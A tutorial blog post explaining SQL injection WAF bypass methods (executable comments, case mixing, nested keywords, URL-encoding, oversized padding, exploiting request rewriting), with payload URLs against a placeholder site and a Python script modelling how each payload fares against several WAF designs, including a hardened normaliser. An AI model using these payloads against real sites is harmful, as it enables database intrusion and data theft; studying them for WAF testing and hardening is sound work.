SQL Injection (WAF Bypass Methods)
As-salamu alaykum friends, I am Malik Ubi and today I will show you how to bypass Web Application
Firewalls (WAFs). I will explain WAF bypass from the simplest and
most basic techniques to the most advanced ones I have learned, so let's play the game!
NOTE: If you don’t know SQL injection yet, read an SQL injection tutorial first. Everything below assumes you can already build a working UNION SELECT query; the syntax used throughout (/*! */ comments, version(), concat_ws()) is MySQL syntax.
What is a WAF?
WAF stands for Web Application Firewall. It sits in front of the web application, inspects
incoming requests and blocks those that match known attack patterns, SQL injection among them.
Most of the tricks below work for one reason: the WAF matches signatures against the request
text, while the database parses that text by its own rules. Anything the two interpret
differently is a potential bypass.
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple. Send a request containing a typical SQL injection payload
(usually a “UNION SELECT” probe). If the server answers with a block response such as
403 Forbidden or 406 Not Acceptable, while the same URL without the payload loads
normally, a WAF is almost certainly in the way.
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 error.)
Not every WAF answers with an error code, though: some return a 200 with a block page, some
silently drop the request, and some rewrite the request and pass it on, which is exactly
what several of the methods below exploit. Always compare against the benign request.
Basic/Simple Methods:
First, of course, we need to know the basic methods to bypass a WAF.
1) Comments:
You can wrap the keywords in MySQL executable comments to bypass a WAF:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First method that can bypass a WAF.)
A /*!...*/ comment is a MySQL-specific construct: MySQL executes whatever is inside it, while
a signature written for the plain text “UNION SELECT” no longer matches because of the comment
markers in between. Other databases treat it as an ordinary comment and ignore the contents,
so this only helps against a MySQL backend. However, most WAFs strip comments before
matching, so they still return a “Forbidden” error.
2) Change the Case of the Letters:
SQL keywords are case-insensitive, so you can also change the case of the command:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another basic method to bypass a WAF.)
This only defeats a filter that matches case-sensitively. As before, most WAFs lower-case
the request before matching and detect this trick.
3) Combine the previous Methods:
What you can also do is combine the previous two methods:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….
This combination gets past many Web Application Firewalls, more than either trick alone,
but any WAF that strips comments and normalises case before matching will still catch it.
4) Replaced Keywords:
Some firewalls do not block the request but delete the “UNION” and “SELECT” keywords when
they find them in the URL and pass the rest on. If that deletion happens in a single pass,
we can nest each keyword inside itself:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The inner “union” and “select” are removed, so what is forwarded to the application is
“UNION SELECT”.)
This method only works against firewalls that strip the keywords once rather than repeating
the strip until nothing changes, and it fails completely against a WAF that blocks instead
of stripping: the database would then receive “UNIunionON SELselectECT” unchanged, which is
a syntax error, not an injection.
5) Inline Comments and URL-encoded Letters:
Some firewalls are bypassed by inserting an empty inline comment between “UNION” and
“SELECT” (MySQL treats /**/ as whitespace) and URL-encoding some of the letters:
http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(%55 is the URL encoding of “U” and %53 of “S”. The web server decodes them before the value
reaches the database, so this only works if the WAF matches on the raw, still-encoded
request. See more in the advanced section.)
I believe these are the most basic methods of WAF bypassing. Let’s move on to the more
advanced ones.
Advanced Methods:
Now that you have learned the basic WAF bypasses, it is time to look at the more advanced
methods.
1) Oversized Requests (often called “Buffer Overflow / Firewall Crash”):
This technique is usually described as a buffer overflow, but that name is misleading: the
request does not corrupt memory in the WAF, whatever language it is written in. What it
relies on is that many WAFs only inspect a limited amount of each request, or fail open when
a request is larger or stranger than they are configured to handle. Padding the query with a
long junk value in front of the real payload can push the payload outside the inspected
window:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
(The hex literal 0xAAAA… is valid MySQL and harmless on its own; it is only there to make the
request long.)
(( You can check how the WAF reacts to unusual input by sending:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
This combines URL-encoded newlines (%0A), throw-away comments and a version-conditional
/*!50000 ... */ comment, which MySQL 5.0.0 and later execute. If you get a 500 instead of a
403, the request was not blocked: it reached the application, which then failed on it. That
is the signal that the padding approach is worth trying. ))
2) Replace Characters with their HEX Values:
We can replace some characters with their hex (URL-encoded) values.
Example:
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”: %6e is “n” and %6c is “l”)
The web server URL-decodes the parameter before the application builds the query, so the
database sees the real keyword. The bypass therefore works only against a WAF that matches
on the undecoded request, or that decodes differently from the server (a double-encoded
%256e, for example, survives one round of decoding as %6e). Any text-to-hex converter with a
“hex encoded for URL” output produces these values.
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from “UNION SELECT”, other commands may be blocked.
Commonly blocked commands and what to use instead (MySQL):
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws()
group_concat() | concat_ws()
The difference between concat() and concat_ws(): concat() returns NULL as soon as any
argument is NULL, while concat_ws() takes a separator as its first argument and skips NULL
arguments. Note that concat_ws() is not an aggregate function: it joins columns within one
row, whereas group_concat() joins values across rows, so that substitution only works where
a single row is enough. Learning MySQL really helps with such issues.
4) Misc Exploitable Functions:
Many firewalls try to add protection with home-grown or strange request-rewriting functions
(which, of course, we can exploit).
Example:
The firewall below strips “*” (asterisks) from the request, but only after it has run its
signature check. What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4… ;
(The signature check sees “uni*on sel*ect”, which matches nothing. The firewall then removes
the “*” and forwards “-15 union select …” to the application.)
So, if you find such a silly function, you can exploit it this way. The general rule:
whenever a WAF modifies a request, look for input that is harmless before the modification
and an attack after it.
[+] In addition to the previous example, some other variants that may slip past a WAF are:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
(Only the last one, union (select …), is standard MySQL syntax. The first three do not parse
as MySQL as written; treat them as fuzzing candidates for confusing a signature that expects
the two keywords separated only by whitespace, not as ready-made payloads.)
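The following is an added example, not code from the original post: a small Python model of the WAF behaviours described in the basic section and in advanced methods 1, 2 and 4, run over the payloads shown on this page. The four WAF models, the 256-byte inspection window and the approximation of what MySQL parses are assumptions made for the demonstration; the payloads are constructed from the forms above with the trailing "…" written out as 1,2,3,4 and the "+" of the URLs written as a space.

```python
import re
from urllib.parse import unquote

# Constructed values for the page_id parameter, built from the forms shown on this page.
PAYLOADS = {
    "plain":       "-15 UNION SELECT 1,2,3,4",
    "exec_cmt":    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "case":        "-15 uNIoN sELecT 1,2,3,4",
    "combined":    "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",
    "nested_kw":   "-15 UNIunionON SELselectECT 1,2,3,4",
    "url_letters": "-15 %55nION/**/%53ElecT 1,2,3,4",
    "hex_letters": "-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4",
    "asterisk":    "-15 uni*on sel*ect 1,2,3,4",
    "crash_probe": "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ 1,2,3,4",
    "padded":      "-15 and (select 1)=(select 0x" + "A" * 1000 + ") /*!uNIOn*/ /*!SeLECt*/ 1,2,3,4",
}

EXEC_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)  # /*!UNION*/ and /*!50000UNION*/
ANY_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)          # /**/, /*yoyu*/
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)
INSPECT_BYTES = 256  # assumed inspection window for the size-limited WAF model


def mysql_sees(forwarded):
    """Assumed approximation of what reaches the MySQL parser: the web server URL-decodes
    the value, MySQL executes the body of /*!...*/ and treats other comments as whitespace."""
    s = unquote(forwarded)
    s = EXEC_COMMENT.sub(r" \1 ", s)
    return ANY_COMMENT.sub(" ", s)


def db_executes_union(forwarded):
    return UNION_SELECT.search(mysql_sees(forwarded)) is not None


# Each WAF model returns None when it blocks, otherwise the string it forwards.
def waf_signature(raw):
    """Basic methods 1-3 and 5: literal, case-sensitive match on the undecoded value."""
    return None if re.search(r"UNION\s+SELECT", raw) else raw


def waf_strip_once(raw):
    """Basic method 4: nothing is blocked; keywords are deleted in one non-recursive pass."""
    return re.sub(r"union|select", "", raw, flags=re.IGNORECASE)


def waf_match_then_mangle(raw):
    """Advanced method 4: signature check first, then every '*' is removed before forwarding."""
    if re.search(r"union\s+select", raw, re.IGNORECASE):
        return None
    return raw.replace("*", "")


def normalize(raw):
    """Canonical form for matching: URL-decode until stable, drop comments,
    collapse whitespace, lower-case."""
    s = raw
    for _ in range(3):  # bounded loop; also undoes double encoding such as %256e
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = EXEC_COMMENT.sub(r" \1 ", s)
    s = ANY_COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def waf_normalized(raw):
    """Hardened model: match on the canonical form and never rewrite the request."""
    return None if UNION_SELECT.search(normalize(raw)) else raw


def waf_inspect_limit(raw):
    """Advanced method 1: the hardened matcher, but only the first INSPECT_BYTES are examined."""
    return None if UNION_SELECT.search(normalize(raw[:INSPECT_BYTES])) else raw


WAFS = {
    "signature": waf_signature,
    "strip_once": waf_strip_once,
    "match_then_mangle": waf_match_then_mangle,
    "inspect_limit": waf_inspect_limit,
    "normalized": waf_normalized,
}


def outcome(waf, raw):
    """'blocked', 'exploited' (UNION SELECT reaches MySQL) or 'harmless' (forwarded but inert)."""
    forwarded = waf(raw)
    if forwarded is None:
        return "blocked"
    return "exploited" if db_executes_union(forwarded) else "harmless"


def evaluate():
    """Outcome of every payload against every WAF model: {waf_name: {payload_name: outcome}}."""
    return {name: {p: outcome(fn, raw) for p, raw in PAYLOADS.items()} for name, fn in WAFS.items()}


if __name__ == "__main__":
    for name, row in evaluate().items():
        print(f"{name:18}", "  ".join(f"{p}={o}" for p, o in row.items()))
```

Running the block prints one row per WAF model. The table makes the page's point explicit: every trick in the basic section gets past the literal matcher, none of them gets past the matcher that decodes and strips comments before comparing, the padded request only wins against the model with an inspection window, and the two remaining wins (the nested keyword and the asterisk) exist only because those WAFs rewrite the request after deciding it is clean.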
That’s all about WAF bypass; I hope you liked it. This one is for the newbies.
#Malik_Ubi